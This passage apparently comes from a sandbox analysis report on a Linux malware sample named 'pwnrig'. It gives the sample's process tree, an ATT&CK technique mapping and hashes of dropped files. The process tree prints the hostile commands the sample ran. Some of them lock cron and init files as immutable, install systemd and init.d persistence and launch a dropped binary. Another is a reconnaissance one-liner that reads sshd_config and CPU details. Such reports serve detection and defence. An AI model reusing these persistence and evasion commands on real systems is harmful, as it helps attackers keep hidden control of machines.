/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
-
/usr/bin/whichwhich chkconfig4⤵
-
-
/usr/bin/whichwhich update-rc.d4⤵
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
-
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Attempts to change immutable files
- Modifies init.d
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵
-
-
/usr/bin/whichwhich systemctl4⤵
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
- Attempts to change immutable files
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
- Reads EFI boot settings
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/hostnamehostname -I4⤵
- Attempts to change immutable files
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/usr/bin/headhead -n 14⤵
-
-
/usr/bin/grepgrep "Port "4⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/sedsed -e "s/\$//"4⤵
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵
-
-
/usr/bin/cutcut -d: -f24⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
-
-
/usr/bin/nohupnohup ./klibsystem51⤵
-
/usr/bin/klibsystem5./klibsystem51⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2XDG Autostart Entries
1Boot or Logon Initialization Scripts
1RC Scripts
1Create or Modify System Process
1Systemd Service
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
2XDG Autostart Entries
1Boot or Logon Initialization Scripts
1RC Scripts
1Create or Modify System Process
1Systemd Service
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify System Firewall
1Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48B
MD5def1d7486172ba61e9598d53036a4ad9
SHA12c0ff59f49b0b97c560a4a18a6667c534d537945
SHA25652574d1100fe31c4d9641659df9e3a70c44fdff7ae121f2d285f5751da5d5cfc
SHA512c79e843a322fd8128c49a1af3acdfbe6a5cef11be325acdb4c493bd96f6a48e4ebafb219aa402a31efc25640a893fcef08fc3a3051a8d99c60801a37581e7857
-
Filesize
56B
MD58c859e42eefa73f61c0fb8d4f7c774b2
SHA16214fc948ec5a137e1354cb5a3b95c4b50ed3a63
SHA2565766ae1a918f0bd012824b8d48e5a6cd798ab58f11898cb7807761e1ad105486
SHA512249cbad473df1d75c20bca35d0bda38cde1bbaaf1fb82a71f41d33b4770d166411fcad7230e43bee3735c00e35df6e15852b3c6875fdf16ee6cc07eb1311fed7
-
Filesize
45B
MD5b054422799689ef51afd93e6dcada227
SHA1214f30c032926bef314b79a655bfac4fd6e594bf
SHA256641abe140afea25af088f566ec1688e4c26ba7ca96f56e642b11d5bb02a5933c
SHA512a45124aaf74accccf7b9e449d579f41bfd793003354c38e513113f8df4170093e568915fee3f7a166669346f1c24abf0fbfd319a6e5c35e24c1a962ba2fa70f6
-
Filesize
48B
MD5eb6b211780ccbdfd5583bfaea0a795f5
SHA1f5283f40c9ca043cb9650bf86a02bfabceb917fe
SHA256d15ef39649f99788713d2eae56157e09210f38fe4e7f0fd93ff3d5fa603a29cf
SHA5123492353732983405f735c4e2b6ea4f42443c1ff724f81ad27c4d620024baecfc4c17f7a34594b6d3a47b95c55a73b654dbc636285578933069dac0140ce7e042
-
Filesize
199B
MD5906980accf4b594d289d69ab3c2b212c
SHA107d5e5111fe11aa1aaa66c61dc4a3df74b3ec6dd
SHA2562e4d6729014e1722ea4839b574d63c0e17a72a99c7ff2fd73bbb981c3429d92c
SHA512467b5bffb60506600723b0b416393853d21bfeb19986537a492716a338de4deb2cfe414e62c047798d1ad3b945d1571f1286e6d9627f823f35e7704b0d095fb0
-
Filesize
196B
MD585af470e35a1ae54466bb6d33978ad92
SHA1d3a7f7639a62dd11db91fbcf55922e29b66f1935
SHA2560940db984b9b439904954693b7d2fd4dd9b295e1cb4c440b203b2e72a3aea0ba
SHA512a2702d6157fe0f475a04ff10d0860756e1aaa7c9ee0ff05ae51ef13c7d8cb358ddc85011557e37a142ec1803e5a8551dbfc873ffa85437e5e97bfdff89c18145
-
Filesize
335B
MD5631c4cbba9e4b1460406d10e565f782a
SHA1047d61155b9be60c794f80764247ef769c215e64
SHA256197b329bf9dbc8a79b5b8e1b71e63e07cd6536555bbc6523116a90cc307f9aa2
SHA5127f036a16230bb2112c764c3a412cf462cf2c03c3b863beb98073774f02e5906d72a1c52992ee5885bea745d771ab3ab20be15090656510982788204da450c446
-
Filesize
384B
MD515caeb685929dab65b1094f9e5c4b29f
SHA12b1141235c528d8ef5aba5ec6567441d04b2634f
SHA256ac406aa204b2dd2c018a98fdb2090f99821be750dae169f5ca13a080822ac8b0
SHA512590862dfff0c3537ea515f8caf28a658c5419140819232d396ce2f0063532d6bb8b6c808df775c3185e6f08f868154879c4980c5d14b38fa1fb2eaa3392a1c71
-
Filesize
381B
MD531fc62b7f5d35aac493ca5162b16f812
SHA123aae8aa6388120308c0bdacb66fee7ac8e8641b
SHA2560e36d48719109e697a24e8fe2f72239109f55071ae9c603f85301029fb09271d
SHA51269e99a9aaebd79746d04cb022107a4b813e4d9a806ba55e53d6493c9b3a893156a5518117dcf8e7d6cdae3e5598a56feff2b108e5707eea85cafcaddb6b7d776
-
Filesize
360B
MD55ef8bc6ff2b248c7603a5e7d9c232e8a
SHA101ab099d6781c8666e41501801f88658ddf17705
SHA2560174d066d6d45ddee8691cb84084efe3f0769f65932bd3ba373248df0ad42879
SHA512b32c120531f88e7cbfd1205761d098d4af57e227214c2a82ab78b83d376fe900b605ecea3ccc8f33c50b50fc2bd9c0e3caa960e4e235e47f5573a55cafceb86b
-
Filesize
2.3MB
MD5b9f096559e923787ebb1288c93ce2902
SHA194851bcc8f9c651bcda0ff33d17356cb0b16cf12
SHA2561fcc2061f767574044ca1e97f92ca1d44ee0b35e0a796e3bd6a949ad4b1175e5
SHA512ce5f09737d0b7191e3b646ed6111bb0ce97544d280223f327c4f4cc652dc840fed639bc0462b88a7f87d071066e302be7980f14faca1f5e6e9bf732637db22be
-
Filesize
184KB
MD563a86932a5bad5da32ebd1689aa814b3
SHA1472548a4b8295182f6ba8641d74725c2250b7243
SHA2560013b356966c3d693b253cdf00c7fdf698890c9b75605be07128cac446904ad9
SHA5124631e014f77c683819ae34278625b21525d9fa0697e5376ff2babfd77af3ca609fb4a82cde2374f2c96b00dc52cdc34d7efdc40a7ee2609566a6b6e9e630f332
-
Filesize
388B
MD534bba0e0c7ab1c364409fc350fa37868
SHA1a362f6eb47fa0ae5973d1d3b72a20e3c727cbd56
SHA2567d3126408366c9a8813fac8aa2e970e18e837542209c38b751bdee68c06304e1
SHA512249b8608d3a89f9e2a075a6b8164457686a256665729d7e441cafcba35567dd157eeb5123221c8ee4377993907e0100bcd55888fb94a36b557074c0df2850b26
-
Filesize
385B
MD59297e32544b3f6f52346919c3dcc4d78
SHA1a817c64117b4cba178242bf99b008c094f836c7c
SHA256fb6251a22cfb915b67202de5f89f331f18559e09438a89914271fe51018a4311
SHA5128472916e8ed3c8cc7c8db00c2dbe6c103d18406deb6f2d3b7cdba2573cc843adff36a7814997a25f134a53434b8d9c87705d0a184534dae617b2e9b385763662
-
Filesize
224B
MD5f19cde57edbf6eec09e71cc747388806
SHA1672918987a55bb6c8af850a0a7d733d628f37e19
SHA256fece5b528c7df260dbe88f2cb3c50548cfe5c59bdd9e0d88332055346c7695de
SHA5122c17c86a3033a4f764ad6260c1b3cab4c9c01e714025b9bf3c988a4d15c76c12485c27b3bf34646de251b5d81b45485dc1069b571227c0f3d4369512314c09d6
-
Filesize
223B
MD5a16b02c91b7479bbff7db66be7a9ef77
SHA1e4cb6929d684fe89cf5ea2f52b7bbef266c7f293
SHA2563bbac5133807d58654db87f83188a898eb54457845f6d1cee03221ec72bf8ed5
SHA512c8afe266da88d9c355f9036affa66038bbee74ce265d3a80f643996c8e2d75a3eb125843706a837f8f7ff97ec1c27fc35504f17fa8dfeed6f8b03b0c78c3bdc1
-
Filesize
219B
MD5b3f93c5e0c4f8d1d736513a220c6b36b
SHA12e98becba692338ca38470cfbd47802ea3ef85c9
SHA256c262e08a2bcf5d08619568acb6151e6a53b982a9ef3d47c3a2b42548f970b1ed
SHA5124ad9aada020df4e07a1ac0e215ea5378c1b41e30657221b705adb6d7d6659833d3a8aaeebd642d23b244603c0f37be5d743ec83ae50e8dd47af6b8ca03ed3e43
-
Filesize
231B
MD59a5f775bd43bbbf801af2d8a629ca7ba
SHA1f3494cfb32066368729f91c99f2a6e172f7262b9
SHA256717fc6f8f4d3d93308dcb7e53185da822a46b03f2fdbe2c287961eb2082e705e
SHA512a6209d22debfa265aa1ea788df6c538f843eed7f421e8161dbd3eadd1d6fb9b63e3b0def6ae711f675054153b6490c222a205cdae4a1905441502afec927cfae
-
Filesize
220B
MD5110a4b4be7c653ea69c6961f91cc4b92
SHA1d3cb5a468e401e118348392bb20e9d090e0af0d3
SHA25635193fb85c0f7dd78d07b0008fc04519e4873d477e4a900529294825d3bc68a2
SHA512f3dc0a870f39473aead0a9cb186859094977b618ba1ac136f6492bb662ca63be5599a3fc2e4f8a60d2bebee21610ed99f384b670b1f784d15eb2292ab7bccf97
-
Filesize
223B
MD50e3bfa0d62dcf9e6b19f64ac7b2f7a6c
SHA155c9a00c3caaf54e07183dcc60b59e692425d3f7
SHA25623f986e9f6cfcaececa1835c2c770d92cbabfd9e6f482574215b8c782d418d48
SHA512a73888b9d9312c4dd4830db61f9575caa18c803e9c7499548778d8dc5dcd3c61b847edc2e547f364271199aa4d425f7039d251b663b2000c9048d80369ee3b0a
-
Filesize
223B
MD54b01b79a9832a1758efbf23e15e7db9d
SHA19526d594b895f4658d119da5048976e946b6c6b6
SHA256f1eb5f96f2a51a37d73dbdb6f27bc378a6f13f73ba9ade8ef7f2eff892cdeaf5
SHA5122124a44cbacfa6e8c1db20e9920f36589099bbe3485a2c763aa2efbcf9c9f86278ce90ea7be8b1b46e3be187bf31c27a7096673ed7c7e192f7b2fdc3e1fddd3b
-
Filesize
220B
MD5dcd5193fc07d8ff522a5e2f60ef32295
SHA1e041913e7adf8cd599e80e63a73c64f136eb0b82
SHA2567da26508b3da399089cf3199858f49db88d72901ce2bf492f723dc6444a5b8f4
SHA512302f86cf3969068a171fed4a481a2ccb4b3cf032901e9a46c6a3219b3b2310fb06b8b8432fe731fb393ace3cbcb57242b4fb8f9e07ada3fb83226e6aaa2c68cb
-
Filesize
223B
MD57dac898f3c5a18b02b75e28f84a194bd
SHA132409de2ccd73efb269afeef33e7a6c89bb5458e
SHA256ae5bb29da763c47b9711f50068e5da118597a0e3d9d42f47ce95c275272464b6
SHA512cbc9497b278452e7a9c08c19c7596c22d7fa82a5987da5cd1f29383dee441ffb1f8bb87b2a8ca1ccb5574877765a0fd1c97f65c206fbfdbb8ac24d016716e151
-
Filesize
220B
MD5ae942fb479c5488e2d27dbf301576574
SHA13de7e5119ca58995d27ebaf64e986b1b5f314fec
SHA256c0ecb046ddea81ff203423bc9ca1955543ec9cf5ac852ee2f0f65cc5bde1742d
SHA51262222066f39c4ed4b47c7b1ed81ff8337123a73a6dfc101abe3911252f6a82cc73ffdb76264a72417b6373890e34772a5a2c5466abc707ed229744450b5b67e2
-
Filesize
231B
MD581ce290b829488b52ae890c7910ffbbf
SHA1a8038fc1be3f53c987997c4dbb687149b5ea36fd
SHA256efa4661286dc2973da507e4091d138c7fd462f970963989b1910c45672a5e2ea
SHA5120bcae9cf45c9b945332cbf0681179cf3179a421bb7b262195b376ecc054a2a84d65cf38b093f54a6fee62e773a4b039243ceb89f1d75ec5bd074908de551c5a4
-
Filesize
223B
MD5081162b035117dc8864f212a0dbc8f3d
SHA145b782f8f10ea7205a57a2fadd26ebe4fcc4e2af
SHA2563c545972617e88c305ba0ad6b811911cc73e06ac8e98216f3b89e571165a66fa
SHA5129945a944a4b3eb6e665ce19abcfce369fa0df1df5ebc6be59d8cb0e13ca59dc6616289791003e34f37f960afe4483612aae49b2c7b4b73ca40790a56474ff2e7
-
Filesize
231B
MD5703a9a59709ee101776741081deefbbe
SHA104d512637c12df8c222ef817bcc2f9a22da7938b
SHA256c6a475d5720687b34cfb676585931aeb8e367e917d0925edd9432fdba5fe9b37
SHA512d809ae39d37e432fd603c23ba229c44314485f15066dcf4d38467fb0a8275fe63c8bf5b8f25c59e129ff61709a23240c7f7e0a48c5e07d17577f0f1a84a04bc6
-
Filesize
7.0MB
MD5c91421f0d68095890b50a034dbf9d060
SHA1624e0d9c94309de8d038b2e21cf07685d2020fdb
SHA2562f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
SHA51263d174cf0ba590aa836a9c4490ef7982d7590d8fcf9f67b8a8021dc23755a4aecf16805a12679e566d6d6bec45a4d3344d62197a7f3c6660c46812594888bd88
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-